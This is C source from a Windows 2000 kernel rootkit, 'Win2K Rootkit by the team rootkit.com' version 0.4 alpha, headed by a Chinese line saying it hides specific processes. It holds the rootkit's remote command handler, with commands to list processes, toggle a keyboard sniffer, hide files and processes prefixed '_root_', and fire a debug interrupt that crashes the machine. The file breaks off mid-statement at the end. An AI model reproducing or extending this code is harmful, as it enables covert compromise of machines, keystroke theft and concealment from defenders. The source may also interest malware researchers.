rk_command.c.old

能够在windows 2000以上操作系统下隐藏特定的进程

#include "rk_driver.h"
#include "rk_command.h"
#include "rk_defense.h"
#include "rk_process.h"


BOOL g_hide_directories = TRUE;
BOOL g_hide_proc = TRUE;
BOOL g_sniff_keys = FALSE;

struct _csrmsg {
	PORT_MESSAGE			PortMessage;
	struct CSRSS_MESSAGE	CsrssMessage;
	PROCESS_INFORMATION		ProcessInformation;
	CLIENT_ID				Debugger;
	ULONG					CreationFlags;
	ULONG					VdmInfo[2];
} csrmsg;


////////////////////////////////////////////////////////////////////
// these functions are dynamically linked out of NTDLL since
// they are not exported.
////////////////////////////////////////////////////////////////////

typedef NTSTATUS (*CsrClientCallServer) (
	IN PVOID Message,
	IN PVOID,
	IN ULONG OpCode,
	IN ULONG Size
);

typedef NTSTATUS (*ZwWriteVirtualMemory) (
	IN HANDLE hProcess,
	IN PVOID BaseAddress,
	IN PVOID Buffer,
	IN ULONG BytesToWrite,
	OUT PULONG BytesWritten
);

//typedef NTSTATUS (*GetEnvironmentStringsW) (
//	...
//);

typedef NTSTATUS (*RtlDestroyProcessParameters) (
	IN PPROCESS_PARAMETERS ProcessParameters
);

typedef NTSTATUS (*RtlCreateProcessParameters) (
	OUT PPROCESS_PARAMETERS *ProcessParameters,
	IN PUNICODE_STRING ImageFile,
	IN PUNICODE_STRING DllPath OPTIONAL,
	IN PUNICODE_STRING CurrentDirectory OPTIONAL,
	IN PUNICODE_STRING CommandLine OPTIONAL,
	IN ULONG CreationFlags,
	IN PUNICODE_STRING WindowTitle OPTIONAL,
	IN PUNICODE_STRING Desktop OPTIONAL,
	IN PUNICODE_STRING Reserved OPTIONAL,
	IN PUNICODE_STRING Reserved2 OPTIONAL 
);

typedef NTSTATUS (*ZwResumeThread) (
	IN HANDLE hThread,
	OUT PULONG pSuspendCount
);

typedef NTSTATUS (*ZwProtectVirtualMemory) (
	IN HANDLE hProcess,
	IN OUT PVOID *BaseAddress,
	IN OUT PULONG RegionSize,
	IN ULONG Protect,
	OUT PULONG OldProtect
);

typedef NTSTATUS (*ZwCreateProcess) (
	OUT PHANDLE phProcess,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN HANDLE hParentProcess,
	IN BOOLEAN bInheritParentHandles,
	IN HANDLE hSection OPTIONAL,
	IN HANDLE hDebugPort OPTIONAL,
	IN HANDLE hExceptionPort OPTIONAL
);

typedef NTSTATUS (*ZwOpenFile) (
	OUT PHANDLE phFile,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	OUT PIO_STATUS_BLOCK pIoStatusBlock,
	IN ULONG ShareMode,
	IN ULONG OpenMode
);








////////////////////////////////////////////////////////////////////
// commands passed from the kernel shell are handled here
// 
////////////////////////////////////////////////////////////////////
void process_rootkit_command(char *theCommand)
{
	char _c[256];
	BOOL return_prompt = TRUE;
	sprintf(_c, "rootkit: process_rootkit_command %s, len %d", theCommand, strlen(theCommand));
	DbgPrint(_c);

	if(0 == strlen(theCommand))
	{
		//the user pressed return, which is meant to break out
		//of sniffer-modes - so make sure all sniffers are off
		if(g_sniff_keys)
		{
			char _t[] = "------------------------------------------\r\nsniffkeys is now OFF.\r\n";
			g_sniff_keys = FALSE;
			ReturnDataToClient(_t, strlen(_t));
		}
	}
	////////////////////////////////////////////////////////////////
	// Command: 'help'
	// return a help string
	////////////////////////////////////////////////////////////////
	else if(0 == strcmp(theCommand, "help"))
	{
		char _help[] =	"Win2K Rootkit by the team rootkit.com\r\n" \
						"Version 0.4 alpha\r\n" \
						"------------------------------------------\r\n" \
						"command          description         \r\n" \
						"\r\n" \
						"ps               show proclist       \r\n" \
						"help             this data           \r\n" \
						"buffertest       debug output        \r\n" \
						"hidedir          hide prefixed file/dir\r\n" \
						"hideproc         hide prefixed processes\r\n" \
						"debugint         (BSOD)fire int3     \r\n" \
						"sniffkeys        toggle keyboard sniffer\r\n" \
						"echo <string>    echo the given string\r\n" \
						"\r\n*(BSOD) means Blue Screen of Death\r\n" \
						"if a kernel debugger is not present!\r\n" \
						"*'prefixed' means the process or filename\r\n" \
						"starts with the letters '_root_'.\r\n" \
						"\r\n";

		ReturnDataToClient(_help, strlen(_help));
	}
	////////////////////////////////////////////////////////////////
	// Command: 'echo' 'string'
	// echo back the string, useful for rootkit patches that need
	// to send data to a connected client
	////////////////////////////////////////////////////////////////
	else if(0 == memcmp(theCommand, "echo ", 5))
	{
		int l = strlen(&theCommand[5]);
		if(l)
		{
			return_prompt=FALSE;

			ReturnDataToClient(&theCommand[5], l);	
		}
	}
	////////////////////////////////////////////////////////////////
	// Command: 'ps'
	// returns the process list running on the host
	////////////////////////////////////////////////////////////////
	else if(0 == strcmp(theCommand, "ps"))
	{
		command_get_proclist();
	}
	////////////////////////////////////////////////////////////////
	// Command: 'buffertest'
	// debug function causes a large number of packets to return
	// used to debug the TCP/IP stack functionality
	////////////////////////////////////////////////////////////////
	else if(0 == strcmp(theCommand, "buffertest"))
	{
		int count=0;
		for(count=0;count<100;count++)
		{
			int x;
			sprintf(_c, ".%d.", count);
			x = strlen(_c);
			ReturnDataToClient(_c, x);
		}
	}
	////////////////////////////////////////////////////////////////
	// Command: 'sniffkeys'
	// toggles keyboard sniffer
	////////////////////////////////////////////////////////////////
	else if(0 == strcmp(theCommand, "sniffkeys"))
	{
		if(g_sniff_keys)
		{
			char _t[] = "keyboard sniffing now OFF\r\n";
			g_sniff_keys = FALSE;
			ReturnDataToClient( _t, strlen(_t));
		}
		else 
		{
			char _t[] = "keyboard sniffing now ON\r\n------------------------------------------\r\n";
			return_prompt=FALSE;
			g_sniff_keys = TRUE;
			ReturnDataToClient( _t, strlen(_t));
		}
	}
	////////////////////////////////////////////////////////////////
	// Command: 'hidedir'
	// toggles directory hiding with '_root_' prefix
	////////////////////////////////////////////////////////////////
	else if(0 == strcmp(theCommand, "hidedir"))
	{
		if(g_hide_directories)
		{
			char _t[] = "directory prefix-hiding now OFF\r\n";
			g_hide_directories = FALSE;
			ReturnDataToClient( _t, strlen(_t));
		}
		else 
		{
			char _t[] = "directory prefix-hiding now ON\r\n";
			g_hide_directories = TRUE;
			ReturnDataToClient( _t, strlen(_t));
		}
	}
	////////////////////////////////////////////////////////////////
	// Command: 'hideproc'
	// toggles process hiding with '_root_' prefix
	////////////////////////////////////////////////////////////////
	else if(0 == strcmp(theCommand, "hideproc"))
	{
		if(g_hide_proc)
		{
			char _t[] = "process prefix-hiding now OFF\r\n";
			g_hide_proc = FALSE;
			ReturnDataToClient( _t, strlen(_t));
		}
		else 
		{
			char _t[] = "process prefix-hiding now ON\r\n";
			g_hide_proc = TRUE;
			ReturnDataToClient( _t, strlen(_t));
		}
	}
	////////////////////////////////////////////////////////////////
	// Command: 'debugint'
	// debug function causes a debug interrupt to fire
	// this will BSOD the machine unless a kernel debugger is
	// present.
	////////////////////////////////////////////////////////////////
	else if(0 == strcmp(theCommand, "debugint"))
	{
		__asm int 3
	}
	else
	{
		char t[256];
		sprintf(t, "error: unknown or malformed command %s\r\n", theCommand);
		ReturnDataToClient( t, strlen(t));
	}
	
	if(return_prompt)
		//this is our prompt, an upside-down question-mark